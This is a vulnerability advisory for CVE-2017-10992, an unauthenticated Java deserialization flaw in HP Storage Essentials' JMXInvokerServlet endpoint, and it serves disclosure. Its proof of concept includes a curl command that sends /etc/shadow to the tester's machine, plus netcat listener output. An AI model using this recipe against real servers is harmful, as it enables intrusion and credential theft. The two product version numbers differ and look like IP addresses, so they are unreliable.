Title: HP Storage Essentials Remote Code Execution via Java deserialization
CVE ID: CVE-2017-10992
CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vendor: HP (www.hp.com)
Products: HP Storage Essentials 22.214.171.124 (possibly others)
Advisory Release Date: 19 September 2017
Advisory URL: https://labs.integrity.pt/advisories/cve-2017-10992
Credits: Discovery by Filipe Bernardo <fb[at]integrity.pt>
The HP Storage Essentials version 126.96.36.199, is vulnerable to an unauthenticated Remote Code Execution via Java deserialization when a user sends a Java serialized request to the service endpoint at: /invoker/JMXInvokerServlet.
The HP Storage Essentials exposes a Java web server at http://[vulnerable_host]/servlet.html, presenting a login form that is used for product administration.
Exploiting the vulnerability
An unauthenticated attacker can send Java serialized payload to the Java server endpoint at http://[vulnerable_host]/invoker/JMXInvokerServlet (which is a JBoss server) and achieve code execution. To achieve remote code execution as a proof of concept, we used the Burp extension “Java SerialKiller” to create a serialized request of the following command:
curl –X post –d @/etc/shadow http://
The vulnerable server connected to the tester’s machine, which had a netcat session listening on port 8888, and sending the /etc/shadow file as the POST body, confirming the execution of an arbitrary command with root privileges:
connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 33098
post / HTTP/1.1